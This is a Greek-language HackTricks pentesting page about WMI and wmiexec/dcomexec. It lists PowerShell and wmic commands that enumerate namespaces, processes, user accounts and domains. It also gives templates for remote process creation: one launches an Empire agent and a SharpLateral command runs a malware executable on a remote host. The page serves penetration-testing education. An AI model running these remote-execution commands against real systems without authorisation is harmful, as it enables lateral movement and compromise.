WmicExec

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
Αποκτήστε το επίσημο PEASS & HackTricks swag
Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.

Πώς Λειτουργεί Εξηγημένο

Οι διεργασίες μπορούν να ανοίξουν σε υπολογιστές όπου το όνομα χρήστη και είτε ο κωδικός πρόσβασης είτε το hash είναι γνωστά μέσω της χρήσης του WMI. Οι εντολές εκτελούνται χρησιμοποιώντας το WMI από το Wmiexec, παρέχοντας μια ημι-διαδραστική εμπειρία κέλυφους.

dcomexec.py: Χρησιμοποιώντας διάφορα σημεία τερματικής DCOM, αυτό το script προσφέρει μια ημι-διαδραστική κέλυφος παρόμοια με το wmiexec.py, εκμεταλλευόμενο ειδικά το αντικείμενο DCOM ShellBrowserWindow. Υποστηρίζει αυτή τη στιγμή τα αντικείμενα MMC20. Application, Shell Windows και Shell Browser Window. (πηγή: Hacking Articles)

Θεμελιώδης Τεχνολογία WMI

Χώρος Ονομάτων

Ο WMI είναι οργανωμένος σε ιεραρχία παρόμοια με έναν κατάλογο, με τον κορυφαίο φάκελο του WMI να είναι το \root, κάτω από τον οποίο οργανώνονται επιπλέον φάκελοι, γνωστοί ως χώροι ονομάτων. Εντολές για την εμφάνιση των χώρων ονομάτων:

# Retrieval of Root namespaces
gwmi -namespace "root" -Class "__Namespace" | Select Name

# Enumeration of all namespaces (administrator privileges may be required)
Get-WmiObject -Class "__Namespace" -Namespace "Root" -List -Recurse 2> $null | select __Namespace | sort __Namespace

# Listing of namespaces within "root\cimv2"
Get-WmiObject -Class "__Namespace" -Namespace "root\cimv2" -List -Recurse 2> $null | select __Namespace | sort __Namespace

Οι κλάσεις εντός ενός namespace μπορούν να εμφανιστούν χρησιμοποιώντας:

gwmwi -List -Recurse # Defaults to "root\cimv2" if no namespace specified
gwmi -Namespace "root/microsoft" -List -Recurse

Κλάσεις

Γνωρίζοντας το όνομα μιας κλάσης WMI, όπως το win32_process, και το namespace στο οποίο ανήκει, είναι κρίσιμο για οποιαδήποτε λειτουργία WMI. Εντολές για να εμφανιστούν οι κλάσεις που αρχίζουν με win32:

Get-WmiObject -Recurse -List -class win32* | more # Defaults to "root\cimv2"
gwmi -Namespace "root/microsoft" -List -Recurse -Class "MSFT_MpComput*"

Επίκληση μιας κλάσης:

# Defaults to "root/cimv2" when namespace isn't specified
Get-WmiObject -Class win32_share
Get-WmiObject -Namespace "root/microsoft/windows/defender" -Class MSFT_MpComputerStatus

Μέθοδοι

Οι μέθοδοι, που είναι μία ή περισσότερες εκτελέσιμες συναρτήσεις των κλάσεων WMI, μπορούν να εκτελεστούν.

# Class loading, method listing, and execution
$c = [wmiclass]"win32_share"
$c.methods
# To create a share: $c.Create("c:\share\path","name",0,$null,"My Description")

# Method listing and invocation
Invoke-WmiMethod -Class win32_share -Name Create -ArgumentList @($null, "Description", $null, "Name", $null, "c:\share\path",0)

Απαρίθμηση WMI

Κατάσταση υπηρεσίας WMI

Εντολές για να επαληθεύσετε αν η υπηρεσία WMI λειτουργεί:

# WMI service status check
Get-Service Winmgmt

# Via CMD
net start | findstr "Instrumentation"

Πληροφορίες συστήματος και διεργασιών

Συλλογή πληροφοριών συστήματος και διεργασιών μέσω του WMI:

Get-WmiObject -ClassName win32_operatingsystem | select * | more
Get-WmiObject win32_process | Select Name, Processid

Για τους επιτιθέμενους, το WMI είναι ένα ισχυρό εργαλείο για την απαρίθμηση ευαίσθητων δεδομένων σχετικά με συστήματα ή domains.

wmic computerystem list full /format:list
wmic process list /format:list
wmic ntdomain list /format:list
wmic useraccount list /format:list
wmic group list /format:list
wmic sysaccount list /format:list

Επιτομή Επιθεσης

Η αναζήτηση απομακρυσμένα στο WMI για συγκεκριμένες πληροφορίες, όπως τοπικοί διαχειριστές ή συνδεδεμένοι χρήστες, είναι εφικτή με προσεκτική κατασκευή των εντολών.

Χειροκίνητη Απομακρυσμένη Αναζήτηση στο WMI

Η αναγνώριση κρυφών τοπικών διαχειριστών σε απομακρυσμένο υπολογιστή και συνδεδεμένων χρηστών μπορεί να επιτευχθεί μέσω συγκεκριμένων αναζητήσεων στο WMI. Το wmic υποστηρίζει επίσης την ανάγνωση από ένα αρχείο κειμένου για την εκτέλεση εντολών σε πολλούς κόμβους ταυτόχρονα.

Για την απομακρυσμένη εκτέλεση ενός διεργασίας μέσω WMI, όπως η εγκατάσταση ενός πράκτορα Empire, χρησιμοποιείται η παρακάτω δομή εντολής, με επιτυχή εκτέλεση που υποδηλώνεται από μια επιστρεφόμενη τιμή "0":

wmic /node:hostname /user:user path win32_process call create "empire launcher string here"

Αυτή η διαδικασία απεικονίζει τη δυνατότητα του WMI για απομακρυσμένη εκτέλεση και απαρίθμηση συστήματος, αναδεικνύοντας τη χρησιμότητά του τόσο για τη διαχείριση συστήματος όσο και για τον έλεγχο διείσδυσης.

Αναφορές

https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/

Αυτόματα Εργαλεία

SharpLateral:

SharpLateral redwmi HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
Αποκτήστε το επίσημο PEASS & HackTricks swag
Ανακαλύψτε The PEASS Family, τη συλλογή μας από αποκλειστικά NFTs
Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.

PreviousWinRM NextStealing Windows Credentials

Last updated 2 months ago